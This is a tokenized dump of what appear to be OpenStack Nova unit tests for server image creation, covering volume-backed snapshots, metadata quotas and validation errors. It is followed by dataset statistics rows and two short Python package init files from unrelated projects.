name|'return'
string|"'%s-%s-%s-%s'"
op|'%'
op|'('
name|'x'
op|'*'
number|'8'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'12'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'body'
op|'='
name|'dict'
op|'('
name|'createImage'
op|'='
name|'dict'
op|'('
name|'name'
op|'='
string|"'snapshot_of_volume_backed'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'extra_properties'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'='
name|'extra_properties'
newline|'\n'
nl|'\n'
dedent|''
name|'image_service'
op|'='
name|'glance'
op|'.'
name|'get_default_image_service'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'bdm'
op|'='
op|'['
name|'dict'
op|'('
name|'volume_id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'volume_size'
op|'='
number|'1'
op|','
nl|'\n'
name|'device_name'
op|'='
string|"'vda'"
op|','
nl|'\n'
name|'delete_on_termination'
op|'='
name|'False'
op|')'
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_block_device_mapping_get_all_by_instance
name|'def'
name|'fake_block_device_mapping_get_all_by_instance'
op|'('
name|'context'
op|','
name|'inst_id'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'fake_block_device'
op|'.'
name|'FakeDbBlockDeviceDict'
op|'('
nl|'\n'
op|'{'
string|"'volume_id'"
op|':'
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
string|"'source_type'"
op|':'
string|"'snapshot'"
op|','
nl|'\n'
string|"'destination_type'"
op|':'
string|"'volume'"
op|','
nl|'\n'
string|"'volume_size'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'device_name'"
op|':'
string|"'vda'"
op|','
nl|'\n'
string|"'snapshot_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'boot_index'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'delete_on_termination'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'no_device'"
op|':'
name|'None'
op|'}'
op|')'
op|']'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.block_device_mapping_get_all_by_instance'"
op|','
nl|'\n'
name|'fake_block_device_mapping_get_all_by_instance'
op|')'
newline|'\n'
nl|'\n'
name|'system_metadata'
op|'='
name|'dict'
op|'('
name|'image_kernel_id'
op|'='
name|'_fake_id'
op|'('
string|"'b'"
op|')'
op|','
nl|'\n'
name|'image_ramdisk_id'
op|'='
name|'_fake_id'
op|'('
string|"'c'"
op|')'
op|','
nl|'\n'
name|'image_root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'image_block_device_mapping'
op|'='
name|'str'
op|'('
name|'bdm'
op|')'
op|','
nl|'\n'
name|'image_container_format'
op|'='
string|"'ami'"
op|')'
newline|'\n'
name|'instance'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
name|'str'
op|'('
name|'uuid'
op|'.'
name|'uuid4'
op|'('
op|')'
op|')'
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'system_metadata'
op|'='
name|'system_metadata'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|','
nl|'\n'
string|"'quiesce_instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|'.'
name|'quiesce_instance'
op|'('
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceQuiesceNotSupported'
op|'('
name|'instance_id'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'test'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'volume'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'size'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'display_description'
op|'='
string|"'fake'"
op|')'
newline|'\n'
name|'snapshot'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'d'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|','
string|"'volume_api'"
op|')'
newline|'\n'
name|'volume_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'volume_api'
newline|'\n'
name|'volume_api'
op|'.'
name|'get'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'volume'
op|')'
newline|'\n'
name|'volume_api'
op|'.'
name|'create_snapshot_force'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'image_id'
op|'='
name|'location'
op|'.'
name|'replace'
op|'('
name|'self'
op|'.'
name|'image_url'
name|'or'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"''"
op|')'
op|','
string|"''"
op|')'
newline|'\n'
name|'image'
op|'='
name|'image_service'
op|'.'
name|'show'
op|'('
name|'None'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'image'
op|'['
string|"'name'"
op|']'
op|','
string|"'snapshot_of_volume_backed'"
op|')'
newline|'\n'
name|'properties'
op|'='
name|'image'
op|'['
string|"'properties'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'kernel_id'"
op|']'
op|','
name|'_fake_id'
op|'('
string|"'b'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'ramdisk_id'"
op|']'
op|','
name|'_fake_id'
op|'('
string|"'c'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'root_device_name'"
op|']'
op|','
string|"'/dev/vda'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'properties'
op|'['
string|"'bdm_v2'"
op|']'
op|')'
newline|'\n'
name|'bdms'
op|'='
name|'properties'
op|'['
string|"'block_device_mapping'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'bdms'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'boot_index'"
op|']'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'source_type'"
op|']'
op|','
string|"'snapshot'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'destination_type'"
op|']'
op|','
string|"'volume'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'snapshot_id'"
op|']'
op|','
name|'snapshot'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'/dev/vda'"
op|','
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'device_name'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'fld'
name|'in'
op|'('
string|"'connection_info'"
op|','
string|"'id'"
op|','
string|"'instance_uuid'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertNotIn'
op|'('
name|'fld'
op|','
name|'bdms'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'for'
name|'k'
name|'in'
name|'extra_properties'
op|'.'
name|'keys'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
name|'k'
op|']'
op|','
name|'extra_properties'
op|'['
name|'k'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_volume_backed_image_no_metadata
dedent|''
dedent|''
name|'def'
name|'test_create_volume_backed_image_no_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_do_test_create_volume_backed_image'
op|'('
op|'{'
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_volume_backed_image_with_metadata
dedent|''
name|'def'
name|'test_create_volume_backed_image_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_do_test_create_volume_backed_image'
op|'('
name|'dict'
op|'('
name|'ImageType'
op|'='
string|"'Gold'"
op|','
nl|'\n'
name|'ImageVersion'
op|'='
string|"'2.0'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_create_volume_backed_image_with_metadata_from_volume
dedent|''
name|'def'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
nl|'\n'
name|'self'
op|','
name|'extra_metadata'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|_fake_id
indent|' '
name|'def'
name|'_fake_id'
op|'('
name|'x'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'%s-%s-%s-%s'"
op|'%'
op|'('
name|'x'
op|'*'
number|'8'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'12'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'body'
op|'='
name|'dict'
op|'('
name|'createImage'
op|'='
name|'dict'
op|'('
name|'name'
op|'='
string|"'snapshot_of_volume_backed'"
op|')'
op|')'
newline|'\n'
name|'if'
name|'extra_metadata'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'='
name|'extra_metadata'
newline|'\n'
nl|'\n'
dedent|''
name|'image_service'
op|'='
name|'glance'
op|'.'
name|'get_default_image_service'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_block_device_mapping_get_all_by_instance
name|'def'
name|'fake_block_device_mapping_get_all_by_instance'
op|'('
name|'context'
op|','
name|'inst_id'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'fake_block_device'
op|'.'
name|'FakeDbBlockDeviceDict'
op|'('
nl|'\n'
op|'{'
string|"'volume_id'"
op|':'
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
string|"'source_type'"
op|':'
string|"'snapshot'"
op|','
nl|'\n'
string|"'destination_type'"
op|':'
string|"'volume'"
op|','
nl|'\n'
string|"'volume_size'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'device_name'"
op|':'
string|"'vda'"
op|','
nl|'\n'
string|"'snapshot_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'boot_index'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'delete_on_termination'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'no_device'"
op|':'
name|'None'
op|'}'
op|')'
op|']'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.block_device_mapping_get_all_by_instance'"
op|','
nl|'\n'
name|'fake_block_device_mapping_get_all_by_instance'
op|')'
newline|'\n'
nl|'\n'
name|'instance'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
nl|'\n'
name|'image_ref'
op|'='
string|"''"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
string|"'image_test_key1'"
op|':'
string|"'test_value1'"
op|','
nl|'\n'
string|"'image_test_key2'"
op|':'
string|"'test_value2'"
op|'}'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|','
nl|'\n'
string|"'quiesce_instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|'.'
name|'quiesce_instance'
op|'('
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceQuiesceNotSupported'
op|'('
name|'instance_id'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'test'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'volume'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'size'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'display_description'
op|'='
string|"'fake'"
op|')'
newline|'\n'
name|'snapshot'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'d'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|','
string|"'volume_api'"
op|')'
newline|'\n'
name|'volume_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'volume_api'
newline|'\n'
name|'volume_api'
op|'.'
name|'get'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'volume'
op|')'
newline|'\n'
name|'volume_api'
op|'.'
name|'create_snapshot_force'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'image_id'
op|'='
name|'location'
op|'.'
name|'replace'
op|'('
name|'self'
op|'.'
name|'image_base_url'
op|','
string|"''"
op|')'
newline|'\n'
name|'image'
op|'='
name|'image_service'
op|'.'
name|'show'
op|'('
name|'None'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
name|'properties'
op|'='
name|'image'
op|'['
string|"'properties'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'test_key1'"
op|']'
op|','
string|"'test_value1'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'test_key2'"
op|']'
op|','
string|"'test_value2'"
op|')'
newline|'\n'
name|'if'
name|'extra_metadata'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'key'
op|','
name|'val'
name|'in'
name|'extra_metadata'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
name|'key'
op|']'
op|','
name|'val'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vol_backed_img_with_meta_from_vol_without_extra_meta
dedent|''
dedent|''
dedent|''
name|'def'
name|'test_create_vol_backed_img_with_meta_from_vol_without_extra_meta'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_vol_backed_img_with_meta_from_vol_with_extra_meta
dedent|''
name|'def'
name|'test_create_vol_backed_img_with_meta_from_vol_with_extra_meta'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
nl|'\n'
name|'extra_metadata'
op|'='
op|'{'
string|"'a'"
op|':'
string|"'b'"
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_snapshots_disabled
dedent|''
name|'def'
name|'test_create_image_snapshots_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Don\'t permit a snapshot if the allow_instance_snapshots flag is\n False\n """'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'allow_instance_snapshots'
op|'='
name|'False'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_with_metadata
dedent|''
name|'def'
name|'test_create_image_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
op|'{'
string|"'key'"
op|':'
string|"'asdf'"
op|'}'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'image_url'
op|'+'
string|"'123'"
name|'if'
name|'self'
op|'.'
name|'image_url'
name|'else'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"'123'"
op|')'
op|','
name|'location'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_with_too_much_metadata
dedent|''
name|'def'
name|'test_create_image_with_too_much_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
op|'{'
op|'}'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'for'
name|'num'
name|'in'
name|'range'
op|'('
name|'CONF'
op|'.'
name|'quota_metadata_items'
op|'+'
number|'1'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'['
string|"'foo%i'"
op|'%'
name|'num'
op|']'
op|'='
string|'"bar"'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPForbidden'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_no_name
dedent|''
name|'def'
name|'test_create_image_no_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_blank_name
dedent|''
name|'def'
name|'test_create_image_blank_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"''"
op|','
nl|'\n'
op|'}'
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_bad_metadata
dedent|''
name|'def'
name|'test_create_image_bad_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'geoff'"
op|','
nl|'\n'
string|"'metadata'"
op|':'
string|"'henry'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_create_image_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|snapshot
indent|' '
name|'def'
name|'snapshot'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'snapshot'"
op|','
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"createImage"'
op|':'
op|'{'
nl|'\n'
string|'"name"'
op|':'
string|'"test_snapshot"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.037613 | 104 | 0.595273 | 15,247 | 102,091 | 3.859645 | 0.030104 | 0.181281 | 0.080377 | 0.088023 | 0.929581 | 0.8993 | 0.86302 | 0.831515 | 0.802321 | 0.768335 | 0 | 0.003376 | 0.097658 | 102,091 | 8,480 | 105 | 12.039033 | 0.635436 | 0 | 0 | 0.962972 | 0 | 0 | 0.348816 | 0.050759 | 0 | 0 | 0 | 0 | 0.010024 | 0 | null | null | 0.003066 | 0.002241 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
47990727a22621b3372eff5ba37c9f815848c143 | 49 | py | Python | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 6 | 2021-08-17T09:26:16.000Z | 2022-03-30T23:17:42.000Z | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 3 | 2021-08-17T09:42:47.000Z | 2021-09-27T05:56:38.000Z | fewshot_re_kit/network/__init__.py | adonis704/ucas_2021_hc_15 | 7308c3b32962ef5430d85ccfcb199ebe40bf4a7f | [
"MIT"
] | 5 | 2021-08-18T14:25:48.000Z | 2022-03-28T02:59:16.000Z | from . import embedding
#from . import encoder
| 16.333333 | 24 | 0.734694 | 6 | 49 | 6 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204082 | 49 | 2 | 25 | 24.5 | 0.923077 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
479ec410bb3142f6e515a874959bd29be6cd6d94 | 37 | py | Python | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/file_dcd/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | from .is_file_dcd import is_file_dcd
